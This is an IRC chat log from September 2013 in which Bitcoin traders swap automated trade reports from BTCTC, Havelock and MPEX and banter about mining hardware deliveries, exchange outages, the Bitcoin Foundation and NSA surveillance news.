22:53:17 they got FPGA-like power/perfomrance ratio Sep 11 22:53:23 not so bad Sep 11 22:54:03 [HAVELOCK] [XBOND] 8 @ 0.00111111 = 0.0089 BTC [-] Sep 11 22:55:27 [HAVELOCK] [XBOND] 72 @ 0.00111111 = 0.08 BTC [-] Sep 11 22:57:15 [HAVELOCK] [AM100] 4 @ 0.02149 = 0.086 BTC [+] Sep 11 22:57:35 but with tens of bytes of memory per core, programming must have really sucked Sep 11 22:58:57 http://www.explosm.net/comics/3286/ Sep 11 22:58:58 Cyanide & Happiness #3286 - Explosm.net Sep 11 22:59:24 ha Sep 11 22:59:35 [MPEX] [S.MPOE] 191 @ 0.00089295 = 0.1706 BTC [+] Sep 11 23:01:19 [MPEX] [S.MPOE] 18409 @ 0.0008924 = 16.4282 BTC [-] Sep 11 23:01:21 [MPEX] [S.MPOE] 4791 @ 0.00089667 = 4.2959 BTC [+] Sep 11 23:04:10 [HAVELOCK] [CFIG] 3 @ 0.14639999 = 0.4392 BTC [+] Sep 11 23:04:59 [BTCTC] [LABCOIN] 5 @ 0.003398 = 0.017 BTC [+] Sep 11 23:05:00 [BTCTC] [LABCOIN] 65 @ 0.003399 = 0.2209 BTC [+] Sep 11 23:05:21 [HAVELOCK] [CFIG] 1 @ 0.1464 BTC [+] Sep 11 23:05:27 [HAVELOCK] [CFIG] 4 @ 0.149 = 0.596 BTC [+] Sep 11 23:05:52 [BTCTC] [LABCOIN] 65 @ 0.003399 = 0.2209 BTC [+] Sep 11 23:06:10 [HAVELOCK] [AM100] 1 @ 0.02149 BTC [+] Sep 11 23:06:26 [BTCTC] [DMS.PURCHASE] 1 @ 0.012 BTC [-] Sep 11 23:06:53 [BTCTC] [LABCOIN] 65 @ 0.003399 = 0.2209 BTC [+] Sep 11 23:07:30 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0006332 BTC [+] Sep 11 23:07:32 [BTCTC] [ACTIVEMINING] 10 @ 0.003325 = 0.0333 BTC [-] Sep 11 23:07:34 [BTCTC] [ACTIVEMINING] 35 @ 0.003316 = 0.1161 BTC [-] Sep 11 23:07:38 [HAVELOCK] [AM100] 21 @ 0.0215 = 0.4515 BTC [+] Sep 11 23:08:27 [BTCTC] [PAJKA.BOND] 3 @ 0.0143 = 0.0429 BTC [+] Sep 11 23:08:47 [BTCTC] [DMS.PURCHASE] 1 @ 0.012 BTC [-] Sep 11 23:10:13 [BTCTC] [DMS.PURCHASE] 1 @ 0.012 BTC [-] Sep 11 23:10:26 [BTCTC] [DMS.MINING] 17 @ 0.002649 = 0.045 BTC [+] Sep 11 23:11:11 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0006332 BTC [+] Sep 11 23:11:42 [BTCTC] [LABCOIN] 200 @ 0.003447 = 0.6894 BTC [+] Sep 11 23:11:42 [BTCTC] [LABCOIN] 600 @ 0.003401 = 2.0406 BTC [-] Sep 11 23:11:44 [BTCTC] [LABCOIN] 1000 @ 0.0034 = 3.4 BTC [-] Sep 11 23:12:00 [BTCTC] [DMS.MINING] 16 @ 0.002561 = 0.041 BTC [-] Sep 11 23:12:45 [BTCTC] [DMS.PURCHASE] 1 @ 0.012 BTC [-] Sep 11 23:13:30 [BTCTC] [DMS.PURCHASE] 1 @ 0.01128 BTC [-] Sep 11 23:13:41 [BTCTC] [NASTY-PT] 1 @ 0.002 BTC [+] Sep 11 23:14:03 [BTCTC] [LABCOIN] 335 @ 0.003403 = 1.14 BTC [+] Sep 11 23:14:04 [BTCTC] [LABCOIN] 5 @ 0.003402 = 0.017 BTC [-] Sep 11 23:14:06 [BTCTC] [LABCOIN] 931 @ 0.003401 = 3.1663 BTC [-] Sep 11 23:15:23 [BTCTC] [LABCOIN] 69 @ 0.003401 = 0.2347 BTC [-] Sep 11 23:15:33 anybody know why bitstamp is no longer updating bitcoincharts? Sep 11 23:15:36 http://bitcoincharts.com/markets/ Sep 11 23:15:48 Bitcoin Charts / Markets Sep 11 23:15:52 [BTCTC] [DMS.MINING] 1 @ 0.002561 BTC [-] Sep 11 23:15:57 qxzn nope. Sep 11 23:16:27 broken api I would guess, it has disappeared from IRC too Sep 11 23:16:56 maybe they're being attaxed. Sep 11 23:17:03 [BTCTC] [LABCOIN] 254 @ 0.003371 = 0.8562 BTC [-] Sep 11 23:17:51 [BTCTC] [DMS.MINING] 5 @ 0.00256 = 0.0128 BTC [-] Sep 11 23:17:53 [BTCTC] [DMS.MINING] 11 @ 0.00256 = 0.0282 BTC [-] Sep 11 23:18:25 [BTCTC] [DMS.MINING] 100 @ 0.002559 = 0.2559 BTC [-] Sep 11 23:18:28 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.000576 = 0.0144 BTC [-] Sep 11 23:19:04 [MPEX] [S.MPOE] 9634 @ 0.00089667 = 8.6385 BTC [+] Sep 11 23:19:06 [MPEX] [S.MPOE] 666 @ 0.00089676 = 0.5972 BTC [+] Sep 11 23:19:09 [BTCTC] [DMS.MINING] 421 @ 0.00255 = 1.0736 BTC [-] Sep 11 23:21:11 [BTCTC] [DMS.MINING] 328 @ 0.00255 = 0.8364 BTC [-] Sep 11 23:24:39 [BTCTC] [BASIC-MINING] 5 @ 0.1313 = 0.6565 BTC [-] Sep 11 23:25:00 nah prolly updating css Sep 11 23:26:32 [BTCTC] [ASICMINER-PT] 1 @ 2.217 BTC [-] Sep 11 23:27:10 [BTCTC] [LABCOIN] 1 @ 0.00175 BTC [-] Sep 11 23:27:12 [BTCTC] [ASICMINER-PT] 1 @ 2.217 BTC [-] Sep 11 23:27:37 kakobrekla heh Sep 11 23:27:48 [BTCTC] [ASICMINER-PT] 1 @ 2.217 BTC [-] Sep 11 23:27:48 I will prod Nejc Sep 11 23:27:49 [HAVELOCK] [SDSTM] 2 @ 0.00288 = 0.0058 BTC [+] Sep 11 23:28:23 [BTCTC] [ASICMINER-PT] 1 @ 2.217 BTC [-] Sep 11 23:29:34 http://www.theguardian.com/world/2013/sep/11/nsa-americans-personal-data-israel-documents Sep 11 23:29:37 NSA shares raw intelligence including Americans' data with Israel | World news | theguardian.com Sep 11 23:30:13 that was unexpected! :/ Sep 11 23:30:30 orly ?! Sep 11 23:31:38 it completely disturbed my view of the world ! Sep 11 23:31:56 if you're trolling it's like 3/10 Sep 11 23:32:22 yeah it sux. We're paying them to spy on us and give our emails to other countries. Sep 11 23:32:47 hehe, yes i am Sep 11 23:32:51 [HAVELOCK] [SMG] 1 @ 0.0002 BTC [+] Sep 11 23:32:56 the good thing is, if you don't backup your data, you can put in a request to the nsa to get a copy from them Sep 11 23:33:07 or ask the Israeli govt Sep 11 23:33:20 there you go Sep 11 23:34:06 alecpap days ago i had a hdd crash and burn Sep 11 23:34:13 i was able to recover a missing article by asking the internets. Sep 11 23:34:13 [HAVELOCK] [CBTC] 10000 @ 0.00045947 = 4.5947 BTC [+] Sep 11 23:34:22 haha nice Sep 11 23:34:26 nsa is thus obsolete. Sep 11 23:36:53 [BTCTC] [LABCOIN] 1 @ 0.003406 BTC [+] Sep 11 23:37:29 [MPEX] [S.MPOE] 200 @ 0.00089029 = 0.1781 BTC [-] Sep 11 23:37:31 [MPEX] [S.MPOE] 3747 @ 0.00088963 = 3.3334 BTC [-] Sep 11 23:38:14 [HAVELOCK] [CFIG] 6 @ 0.149 = 0.894 BTC [+] Sep 11 23:41:32 [BTCTC] [KENILWORTH] 1 @ 0.001768 BTC [-] Sep 11 23:42:06 http://catalogue.drouot.com/ref-drouot/lot-ventes-aux-encheres-drouot.jsp?id=942230 << art. Sep 11 23:45:05 listen up bitches...I finally got my shipment from BFL Sep 11 23:45:18 First box set up: 54,305.31 MH/s 3188421 (99.75%) 7838 / 0 / 123 0:00:07 Sep 11 23:45:35 is it still a scam? Sep 11 23:45:36 hmm Sep 11 23:45:55 well.. how long ago did you pay for it? :P Sep 11 23:46:35 [BTCTC] [LABCOIN] 200 @ 0.003449 = 0.6898 BTC [+] Sep 11 23:47:37 umm heh... Sep 11 23:47:48 last year sometime..actually its been more than a yar Sep 11 23:47:50 year Sep 11 23:47:53 lolk. Sep 11 23:47:56 :/ Sep 11 23:47:58 pix >? Sep 11 23:48:12 im still in the office..my friend set it up for me I'll snap some Sep 11 23:48:18 cool. Sep 11 23:48:29 i'll be back later c-ya Sep 11 23:51:01 i don't mean to be a hater, grats on your hardware krs1 :) Sep 11 23:51:35 [HAVELOCK] [AM100] 1 @ 0.02188 BTC [+] Sep 11 23:53:53 [HAVELOCK] [CBTC] 19191 @ 0.00045947 = 8.8177 BTC [+] Sep 11 23:56:39 [HAVELOCK] [CBTC] 660 @ 0.00045947 = 0.3033 BTC [+] Sep 11 23:56:42 at least it looks good Sep 11 23:57:54 [BTCTC] [LABCOIN] 312 @ 0.003401 = 1.0611 BTC [-] Sep 11 23:57:56 [BTCTC] [LABCOIN] 156 @ 0.0034 = 0.5304 BTC [-] Sep 11 23:57:57 [BTCTC] [LABCOIN] 1000 @ 0.003399 = 3.399 BTC [-] Sep 11 23:57:58 [BTCTC] [LABCOIN] 100 @ 0.003388 = 0.3388 BTC [-] Sep 11 23:57:58 [BTCTC] [LABCOIN] 300 @ 0.003387 = 1.0161 BTC [-] Sep 11 23:57:59 [BTCTC] [LABCOIN] 333 @ 0.003381 = 1.1259 BTC [-] Sep 11 23:58:01 [BTCTC] [LABCOIN] 456 @ 0.00338 = 1.5413 BTC [-] Sep 11 23:58:11 https://bitcointalk.org/index.php?topic=67547.msg3120025#msg3120025 though I really like the PSU and cables more Sep 11 23:58:16 Starting a new FPGA mining farm/contract Cognitive Resurrected on [BTC-TC] Sep 11 23:59:07 assuming Avalon actually refundsm people should be thanking their lucky stars Sep 11 23:59:25 getting the chips now would be much worse Sep 12 00:01:21 [HAVELOCK] [LABCO] 30 @ 0.00384 = 0.1152 BTC [+] Sep 12 00:02:00 BETCHA BY GOLLY WOW Sep 12 00:02:08 Avalon is refunding Sep 12 00:02:15 [HAVELOCK] [CBTC] 1741 @ 0.00045947 = 0.7999 BTC [+] Sep 12 00:02:18 [HAVELOCK] [CBTC] 1054 @ 0.00045947 = 0.4843 BTC [+] Sep 12 00:02:48 in usd value? Sep 12 00:03:06 they never accepted fiat so i sure hope note Sep 12 00:03:11 not* Sep 12 00:03:16 didnt they have payment processors Sep 12 00:03:21 for each batch another one Sep 12 00:03:29 maybe, i didnt buy Sep 12 00:03:50 [HAVELOCK] [XBOND] 10 @ 0.00116999 = 0.0117 BTC [+] Sep 12 00:04:00 [HAVELOCK] [XBOND] 7 @ 0.00116999 = 0.0082 BTC [+] Sep 12 00:04:01 was fiat worth less then? Sep 12 00:04:02 i ssupect it won't do either. Sep 12 00:04:36 i'd sure be surprised if they refunded Sep 12 00:05:26 GOOD Guy BFL delivers products on time Sep 12 00:05:29 no need to refund Sep 12 00:05:32 [BTCTC] [ACTIVEMINING] 6 @ 0.003317 = 0.0199 BTC [+] Sep 12 00:05:34 [BTCTC] [ACTIVEMINING] 19 @ 0.003316 = 0.063 BTC [-] Sep 12 00:05:35 [BTCTC] [ACTIVEMINING] 152 @ 0.003315 = 0.5039 BTC [-] Sep 12 00:05:36 [BTCTC] [ACTIVEMINING] 261 @ 0.003272 = 0.854 BTC [-] Sep 12 00:05:44 kakobrekla i recall the meanwhile defunct first processor they used and the horror it caused Sep 12 00:05:45 o glory. Sep 12 00:06:20 avalon takes to long and has to refund (those damn scammers) http://imgur.com/gzYTmZP Sep 12 00:06:31 ;;bc,stats Sep 12 00:06:33 Current Blocks: 257396 | Current Difficulty: 8.693301777119441E7 | Next Difficulty At Block: 258047 | Next Difficulty In: 651 blocks | Next Difficulty In About: 3 days, 4 hours, 12 minutes, and 52 seconds | Next Difficulty Estimate: 107058772.733 | Estimated Percent Change: 23.15088 Sep 12 00:06:37 which one was the first one Sep 12 00:06:44 indeed something got delivered Sep 12 00:07:19 webcoins or some shit Sep 12 00:07:21 wsomething Sep 12 00:07:52 .d Sep 12 00:07:53 86933017.77119 | Next Diff in 651 blocks | Estimated Change: 23.0983% in 3d 11h 23m 30s Sep 12 00:07:59 ;;estimate Sep 12 00:08:00 Next difficulty estimate | 107058772.733 based on data since last change | 117890750.78 based on data for last three days Sep 12 00:08:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.02189 BTC [-] Sep 12 00:08:17 [HAVELOCK] [AM100] 10 @ 0.02199 = 0.2199 BTC [+] Sep 12 00:08:35 WalletBit Sep 12 00:08:51 [HAVELOCK] [AM100] 10 @ 0.022 = 0.22 BTC [+] Sep 12 00:09:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.02189 BTC [-] Sep 12 00:09:49 [BTCTC] [TAT.ASICMINER] 10 @ 0.02189 = 0.2189 BTC [-] Sep 12 00:09:50 [BTCTC] [TAT.ASICMINER] 3 @ 0.02189 = 0.0657 BTC [-] Sep 12 00:11:34 http://www.howtovanish.com/2013/09/roger-ver-endorses-trace-mayer-for-bitcoin-foundation-board-seat/ Sep 12 00:11:37 Roger Ver Endorses Trace Mayer For Bitcoin Foundation Board Seat Sep 12 00:11:41 ain't it nice? Sep 12 00:11:59 [HAVELOCK] [CBTC] 60 @ 0.00045947 = 0.0276 BTC [+] Sep 12 00:12:15 i hate the bitcoin foundation Sep 12 00:12:22 we need an anti-bitcoin foundation Sep 12 00:12:32 anti-bitcoin non-foundation Sep 12 00:12:40 how they jerk each other...got me excited Sep 12 00:12:47 how often do they do these board appointments? Sep 12 00:13:00 *aroused is the right word Sep 12 00:13:16 lol jurov seems like youd enjoy it among them Sep 12 00:13:25 [HAVELOCK] [XBOND] 234 @ 0.00116999 = 0.2738 BTC [+] Sep 12 00:13:34 [HAVELOCK] [XBOND] 10 @ 0.00117 = 0.0117 BTC [+] Sep 12 00:13:41 pity it's only verbal afaik..i'm not much into verbal jerking Sep 12 00:13:51 pro-bitcoin counter-foundation Sep 12 00:14:09 [HAVELOCK] [XBOND] 280 @ 0.001175 = 0.329 BTC [+] Sep 12 00:14:10 anyway, who's tracey maer ? Sep 12 00:14:12 WE DO IT! Sep 12 00:14:18 there is unsystem...but i guess it's not exactly what you want :) Sep 12 00:14:30 just call it something more official sounding Sep 12 00:14:36 if only one coul untaaki unsystem Sep 12 00:14:40 The Official Bitcoin Foundation Sep 12 00:14:41 could Sep 12 00:14:41 Trace Mayer is an entrepreneur, investor, journalist, monetary scientist and ardent defender of the freedom of speech. Sep 12 00:14:41 He holds a degree in Accounting Sep 12 00:14:46 dude! let Sep 12 00:14:49 s throw panties! Sep 12 00:14:51 [HAVELOCK] [XBOND] 6 @ 0.001175 = 0.0071 BTC [+] Sep 12 00:15:18 [HAVELOCK] [CBTC] 1 @ 0.00045947 BTC [+] Sep 12 00:17:50 [HAVELOCK] [CBTC] 11 @ 0.00045947 = 0.0051 BTC [+] Sep 12 00:21:19 "Well, lets throw it all on the table now then shall we? I suffer from manic depression.. And sometimes I have bad days. Thanks for calling it to everyone's attention that I get a bit overly sad at things sometimes. Pretty sure everyone has had those days where they think throwing themselves under a bus might be a good thing. But at the end of the day we are still here aren't we? You're Sep 12 00:21:19 crying about nothing in reality KoS. I like to roll the dice sometimes and every so often I have a bad day. But to accuse me the way you do is unjust. And frankly makes you look like a dick." ---future issuer Sep 12 00:21:25 https://bitcointalk.org/index.php?topic=292465.msg3130714;topicseen#new Sep 12 00:21:30 KLYEMINED Project Sep 12 00:21:52 [BTCTC] [TAT.ASICMINER] 3 @ 0.02132 = 0.064 BTC [-] Sep 12 00:21:52 [BTCTC] [TAT.ASICMINER] 10 @ 0.02131 = 0.2131 BTC [-] Sep 12 00:21:54 this thread is beautiful. I didn't imagine it would go that low so fast Sep 12 00:21:54 [BTCTC] [TAT.ASICMINER] 7 @ 0.0213 = 0.1491 BTC [-] Sep 12 00:21:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.0213 BTC [-] Sep 12 00:21:56 [BTCTC] [TAT.ASICMINER] 13 @ 0.02123 = 0.276 BTC [-] Sep 12 00:21:57 [BTCTC] [TAT.ASICMINER] 26 @ 0.02122 = 0.5517 BTC [-] Sep 12 00:22:03 isnt this the kid that shadowed that justdice sharpie girl? Sep 12 00:22:29 KLYE Sep 12 00:23:00 "I have a job interview tomorrow actually. And frankly manic depression isn't a reason not to trust anyone. I keep my pleasure and my business separate. No self respecting person would gamble IPO money" Sep 12 00:24:28 i heard KYLE is living on $10 a week according to a recent justdice chat Sep 12 00:30:32 [BTCTC] [LABCOIN] 1 @ 0.003437 BTC [+] Sep 12 00:33:51 You spend you're time divulging in that non-sense, but you won't setup escrow for a small cookie company that is legit yo? Sep 12 00:34:41 [BTCTC] [LABCOIN] 1000 @ 0.00339 = 3.39 BTC [-] Sep 12 00:34:43 [BTCTC] [LABCOIN] 330 @ 0.00339 = 1.1187 BTC [-] Sep 12 00:34:44 [BTCTC] [LABCOIN] 19 @ 0.003386 = 0.0643 BTC [-] Sep 12 00:34:45 [BTCTC] [LABCOIN] 276 @ 0.003383 = 0.9337 BTC [-] Sep 12 00:34:47 [BTCTC] [LABCOIN] 181 @ 0.003381 = 0.612 BTC [-] Sep 12 00:34:48 [BTCTC] [LABCOIN] 544 @ 0.00338 = 1.8387 BTC [-] Sep 12 00:34:49 [BTCTC] [LABCOIN] 533 @ 0.003372 = 1.7973 BTC [-] Sep 12 00:34:49 [BTCTC] [LABCOIN] 1600 @ 0.003371 = 5.3936 BTC [-] Sep 12 00:34:50 [BTCTC] [LABCOIN] 106 @ 0.003358 = 0.3559 BTC [-] Sep 12 00:34:51 [BTCTC] [LABCOIN] 26 @ 0.003358 = 0.0873 BTC [-] Sep 12 00:34:52 [BTCTC] [LABCOIN] 320 @ 0.003357 = 1.0742 BTC [-] Sep 12 00:34:54 [BTCTC] [LABCOIN] 1946 @ 0.003341 = 6.5016 BTC [-] Sep 12 00:34:55 [BTCTC] [LABCOIN] 5840 @ 0.00334 = 19.5056 BTC [-] Sep 12 00:34:57 [BTCTC] [LABCOIN] 98 @ 0.00334 = 0.3273 BTC [-] Sep 12 00:36:50 [HAVELOCK] [SMG] 36 @ 0.0002 = 0.0072 BTC [+] Sep 12 00:37:09 [HAVELOCK] [SMG] 150 @ 0.0002 = 0.03 BTC [+] Sep 12 00:39:56 ThickAsThieves yeah. Sep 12 00:40:49 the kid is trying, i guess, but a little unstable. Sep 12 00:42:21 mircea_popescu all pushes come with a receipt signed from mpex no? Sep 12 00:42:23 time stamped and all Sep 12 00:42:30 from the pushing end Sep 12 00:42:59 pushes you mean PUSH transactions ? Sep 12 00:43:04 yes Sep 12 00:43:07 PUSH command Sep 12 00:44:49 :( Sep 12 00:44:50 ? Sep 12 00:44:56 yes/no on the receipt Sep 12 00:45:06 ?* Sep 12 00:45:34 [BTCTC] [DMS.MINING] 2 @ 0.00255 = 0.0051 BTC [-] Sep 12 00:47:51 [BTCTC] [LABCOIN] 234 @ 0.003343 = 0.7823 BTC [+] Sep 12 00:49:30 thestringpuller yes on the receipt. Sep 12 00:50:28 coo Sep 12 00:50:30 [HAVELOCK] [XBOND] 1 @ 0.001175 BTC [+] Sep 12 00:51:57 [BTCTC] [LABCOIN] 253 @ 0.00333 = 0.8425 BTC [-] Sep 12 00:52:16 it basically reads as : "Your order to push 1xBla to the account 123abc has been processed successfully. Feel free to forward this receipt to the other party as proof of transfer." Sep 12 00:54:28 as long as it's signed it's legit Sep 12 00:54:39 thx for the quick answer yo Sep 12 00:54:57 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.000571 = 0.0143 BTC [-] Sep 12 00:54:58 [BTCTC] [TAT.VIRTUALMINE] 344 @ 0.00057 = 0.1961 BTC [-] Sep 12 00:55:16 [BTCTC] [ASICMINER-PT] 2 @ 2.254 = 4.508 BTC [+] Sep 12 00:57:04 [HAVELOCK] [AM100] 10 @ 0.022 = 0.22 BTC [+] Sep 12 00:57:14 np Sep 12 00:57:28 [BTCTC] [DMS.MINING] 45 @ 0.00255 = 0.1148 BTC [-] Sep 12 00:57:29 [BTCTC] [DMS.MINING] 35 @ 0.002561 = 0.0896 BTC [+] Sep 12 00:57:45 [BTCTC] [BASIC-MINING] 2 @ 0.14 = 0.28 BTC [+] Sep 12 00:57:50 [HAVELOCK] [AM100] 30 @ 0.022 = 0.66 BTC [+] Sep 12 00:57:58 [BTCTC] [DMS.MINING] 3 @ 0.002561 = 0.0077 BTC [+] Sep 12 01:00:36 [BTCTC] [NASTY-PT] 6 @ 0.002 = 0.012 BTC [+] Sep 12 01:00:37 [BTCTC] [NASTY-PT] 9 @ 0.002 = 0.018 BTC [+] Sep 12 01:00:38 [BTCTC] [NASTY-PT] 1 @ 0.00209 BTC [+] Sep 12 01:00:40 [BTCTC] [NASTY-PT] 500 @ 0.0021 = 1.05 BTC [+] Sep 12 01:00:41 [BTCTC] [BITVPS] 4 @ 0.001901 = 0.0076 BTC [+] Sep 12 01:01:47 bitlluminati Sep 12 01:02:24 tat dat ass up Sep 12 01:05:31 [BTCTC] [ASICMINER-PT] 1 @ 2.254 BTC [+] Sep 12 01:06:16 [BTCTC] [LABCOIN] 5 @ 0.003394 = 0.017 BTC [+] Sep 12 01:06:18 [BTCTC] [LABCOIN] 5 @ 0.003395 = 0.017 BTC [+] Sep 12 01:06:20 [BTCTC] [LABCOIN] 2852 @ 0.003399 = 9.6939 BTC [+] Sep 12 01:06:20 [BTCTC] [LABCOIN] 2852 @ 0.0034 = 9.6968 BTC [+] Sep 12 01:07:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.02189 = 0.0438 BTC [+] Sep 12 01:11:01 [HAVELOCK] [DEALCO] 33 @ 0.010498 = 0.3464 BTC [-] Sep 12 01:11:53 [BTCTC] [TAT.ASICMINER] 3 @ 0.02189 = 0.0657 BTC [+] Sep 12 01:12:23 [HAVELOCK] [CFIG] 2 @ 0.15 = 0.3 BTC [+] Sep 12 01:13:54 [BTCTC] [NASTY-PT] 1 @ 0.002199 BTC [+] Sep 12 01:15:14 [BTCTC] [DMS.MINING] 41 @ 0.002649 = 0.1086 BTC [+] Sep 12 01:16:09 [BTCTC] [NASTY-PT] 6 @ 0.002408 = 0.0144 BTC [+] Sep 12 01:17:31 [BTCTC] [LABCOIN] 50 @ 0.003364 = 0.1682 BTC [-] Sep 12 01:17:53 [BTCTC] [ACTIVEMINING] 2 @ 0.003399 = 0.0068 BTC [+] Sep 12 01:18:04 [BTCTC] [LABCOIN] 52 @ 0.003365 = 0.175 BTC [+] Sep 12 01:18:06 [BTCTC] [LABCOIN] 105 @ 0.003364 = 0.3532 BTC [-] Sep 12 01:24:43 [BTCTC] [LABCOIN] 4 @ 0.003448 = 0.0138 BTC [+] Sep 12 01:24:46 [BTCTC] [TAT.ASICMINER] 12 @ 0.02189 = 0.2627 BTC [+] Sep 12 01:25:19 [BTCTC] [ACTIVEMINING] 5 @ 0.003397 = 0.017 BTC [-] Sep 12 01:25:20 [BTCTC] [ACTIVEMINING] 10 @ 0.003398 = 0.034 BTC [+] Sep 12 01:25:33 [BTCTC] [ASICMINER-PT] 1 @ 2.252 BTC [-] Sep 12 01:26:10 [BTCTC] [TAT.ASICMINER] 10 @ 0.02189 = 0.2189 BTC [+] Sep 12 01:26:12 [BTCTC] [TAT.ASICMINER] 13 @ 0.02189 = 0.2846 BTC [+] Sep 12 01:26:41 [BTCTC] [NASTY-PT] 2 @ 0.002408 = 0.0048 BTC [+] Sep 12 01:26:54 [BTCTC] [TAT.ASICMINER] 26 @ 0.0219 = 0.5694 BTC [+] Sep 12 01:31:54 [BTCTC] [LABCOIN] 5 @ 0.003446 = 0.0172 BTC [-] Sep 12 01:31:55 [BTCTC] [LABCOIN] 5 @ 0.003447 = 0.0172 BTC [+] Sep 12 01:32:08 [BTCTC] [TAT.ASICMINER] 12 @ 0.02127 = 0.2552 BTC [-] Sep 12 01:32:09 [BTCTC] [TAT.ASICMINER] 10 @ 0.02127 = 0.2127 BTC [-] Sep 12 01:32:11 [BTCTC] [TAT.ASICMINER] 57 @ 0.02126 = 1.2118 BTC [-] Sep 12 01:32:19 [BTCTC] [LABCOIN] 1 @ 0.003459 BTC [+] Sep 12 01:32:30 [BTCTC] [LABCOIN] 651 @ 0.003459 = 2.2518 BTC [+] Sep 12 01:32:38 [BTCTC] [LABCOIN] 1 @ 0.00346 BTC [+] Sep 12 01:32:39 [BTCTC] [ASICMINER-PT] 1 @ 2.259 BTC [+] Sep 12 01:33:03 [BTCTC] [LABCOIN] 175 @ 0.00346 = 0.6055 BTC [+] Sep 12 01:33:46 [BTCTC] [LABCOIN] 3 @ 0.00346 = 0.0104 BTC [+] Sep 12 01:34:14 [BTCTC] [ACTIVEMINING] 2 @ 0.003502 = 0.007 BTC [+] Sep 12 01:35:18 [MPEX] [S.MPOE] 3350 @ 0.00088968 = 2.9804 BTC [+] Sep 12 01:39:51 [BTCTC] [ACTIVEMINING] 12 @ 0.003493 = 0.0419 BTC [-] Sep 12 01:42:18 [BTCTC] [DMS.SELLING] 1 @ 0.0094 BTC [-] Sep 12 01:44:04 [BTCTC] [DMS.SELLING] 49 @ 0.0094 = 0.4606 BTC [-] Sep 12 01:46:24 lol Sep 12 01:46:25 http://jezus.si:81/render?target=bitcoin.*.transactions&height=500&width=1100&lineMode=connected Sep 12 01:46:41 bitstamp, dark Sep 12 01:46:43 gox dark Sep 12 01:46:48 bitfloor shutdown Sep 12 01:46:55 btce ... well, ... russians. Sep 12 01:47:05 [BTCTC] [LABCOIN] 75 @ 0.00347 = 0.2603 BTC [+] Sep 12 01:47:58 heh Sep 12 01:51:06 [HAVELOCK] [CBTC] 1500 @ 0.00045945 = 0.6892 BTC [-] Sep 12 01:53:26 lol Sep 12 02:03:22 [BTCTC] [ACTIVEMINING] 118 @ 0.003529 = 0.4164 BTC [+] Sep 12 02:05:54 [HAVELOCK] [CBTC] 1 @ 0.00045946 BTC [+] Sep 12 02:17:02 [BTCTC] [LABCOIN] 1 @ 0.003423 BTC [-] Sep 12 02:17:18 [BTCTC] [BASIC-MINING] 1 @ 0.1329 BTC [-] Sep 12 02:17:23 [HAVELOCK] [AM100] 1 @ 0.022 BTC [+] Sep 12 02:18:00 [BTCTC] [LABCOIN] 1 @ 0.003422 BTC [-] Sep 12 02:18:16 [BTCTC] [BTC-GOLD] 14 @ 0.005521 = 0.0773 BTC [+] Sep 12 02:18:56 [BTCTC] [BTC-GROWTH] 2 @ 0.09816 = 0.1963 BTC [-] Sep 12 02:18:56 [BTCTC] [BTC-GROWTH] 62 @ 0.09815 = 6.0853 BTC [-] Sep 12 02:18:58 [BTCTC] [BTC-GROWTH] 12 @ 0.09815 = 1.1778 BTC [-] Sep 12 02:18:59 [BTCTC] [BTC-GROWTH] 1 @ 0.09814 BTC [-] Sep 12 02:19:00 [BTCTC] [BTC-GROWTH] 8 @ 0.0981 = 0.7848 BTC [-] Sep 12 02:19:02 [BTCTC] [BTC-GROWTH] 100 @ 0.09803 = 9.803 BTC [-] Sep 12 02:19:03 [BTCTC] [BTC-GROWTH] 10 @ 0.09802 = 0.9802 BTC [-] Sep 12 02:19:04 [BTCTC] [BTC-GROWTH] 34 @ 0.09801 = 3.3323 BTC [-] Sep 12 02:20:02 [BTCTC] [LABCOIN] 8 @ 0.003422 = 0.0274 BTC [-] Sep 12 02:21:25 http://blog.cryptographyengineering.com/2013/09/on-nsa.html Sep 12 02:21:28 A Few Thoughts on Cryptographic Engineering: On the NSA Sep 12 02:24:00 not bad Sep 12 02:24:30 Obtaining cleartext access to 'a major internet peer-to-peer voice and text communications system' (Skype?) << Sep 12 02:24:41 there is precisely one bitcoin user to programatically not use skype. since 2011. Sep 12 02:24:41 [BTCTC] [BTC-GOLD] 1 @ 0.005522 BTC [+] Sep 12 02:24:43 guess who. Sep 12 02:25:25 Some fuckin asshole. Sep 12 02:25:33 [BTCTC] [BTC-GOLD] 9 @ 0.00555 = 0.05 BTC [+] Sep 12 02:25:44 :D Sep 12 02:25:55 lol Sep 12 02:26:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.02177 BTC [+] Sep 12 02:26:57 [HAVELOCK] [XBOND] 8 @ 0.0011747 = 0.0094 BTC [-] Sep 12 02:27:16 [HAVELOCK] [SMG] 2 @ 0.0002 = 0.0004 BTC [+] Sep 12 02:28:07 [HAVELOCK] [XBOND] 18 @ 0.001129 = 0.0203 BTC [-] Sep 12 02:28:15 [HAVELOCK] [SMG] 50 @ 0.00018 = 0.009 BTC [-] Sep 12 02:29:03 [HAVELOCK] [CBTC] 63 @ 0.000459 = 0.0289 BTC [-] Sep 12 02:29:14 [HAVELOCK] [CBTC] 3 @ 0.000459 = 0.0014 BTC [-] Sep 12 02:29:39 [HAVELOCK] [SMG] 42 @ 0.0001765 = 0.0074 BTC [-] Sep 12 02:30:11 [HAVELOCK] [CBTC] 16 @ 0.000459 = 0.0073 BTC [-] Sep 12 02:31:00 [HAVELOCK] [CBTC] 5 @ 0.000459 = 0.0023 BTC [-] Sep 12 02:31:57 you can run but you can not hide Sep 12 02:34:26 [BTCTC] [LABCOIN] 129 @ 0.003422 = 0.4414 BTC [-] Sep 12 02:35:20 prepare thy anii Sep 12 02:35:57 I don't understand why people use skype Sep 12 02:36:12 people tell me "it just works", and every time I try it, it fails miserably Sep 12 02:36:15 even on windows Sep 12 02:36:53 and it's not p2p anymore, microsoft/nsa made sure of that Sep 12 02:37:17 i use it cause i talk to idiots Sep 12 02:38:01 i never used til i started talking to bitcoiners Sep 12 02:38:25 I had to use profesionally, even for simply IM Sep 12 02:38:31 i was like Skype? really? Sep 12 02:38:52 i think the appeal is all in the voice chat capability Sep 12 02:39:38 [BTCTC] [BASIC-MINING] 12 @ 0.1317 = 1.5804 BTC [-] Sep 12 02:39:40 [BTCTC] [BASIC-MINING] 3 @ 0.1316 = 0.3948 BTC [-] 